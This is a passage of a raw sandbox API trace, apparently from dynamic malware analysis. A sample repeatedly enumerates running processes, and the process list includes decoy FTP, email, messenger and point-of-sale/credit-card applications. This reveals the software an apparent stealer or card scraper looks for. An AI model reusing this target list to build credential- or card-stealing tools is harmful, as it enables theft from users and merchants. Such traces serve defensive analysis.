th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0191.635] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0191.643] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0191.645] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0191.647] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0191.649] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0191.650] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0191.655] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0191.657] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0191.659] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0191.660] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0191.662] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0191.663] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0191.665] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0191.667] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0191.672] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0191.674] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0191.676] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0191.678] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0191.680] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0191.682] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0191.683] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0191.750] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0191.753] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0191.756] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0191.758] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0191.761] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0191.766] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0191.769] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0191.771] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0191.773] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0191.776] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0191.782] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0191.787] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0191.790] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0191.792] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0191.802] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0191.805] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0191.807] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0191.812] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0191.814] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0191.816] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0191.817] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0191.819] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0191.821] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0191.822] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0191.824] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0191.829] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0191.831] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0191.833] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0191.835] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0191.837] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0191.838] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0191.844] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0191.845] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0191.847] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0191.849] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0191.851] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0191.852] CloseHandle (hObject=0x15a0) returned 1 [0191.852] Sleep (dwMilliseconds=0x64) [0191.856] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0191.866] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.868] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0191.870] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0191.872] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.876] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0191.878] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.880] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0191.881] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0191.883] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0191.885] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.886] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.893] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0191.895] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.896] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.898] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.899] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.901] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.905] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.907] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.908] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0191.910] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0191.911] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0191.913] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.914] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.916] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0191.917] Process32Next (in: hSnapshot=0x15a0, 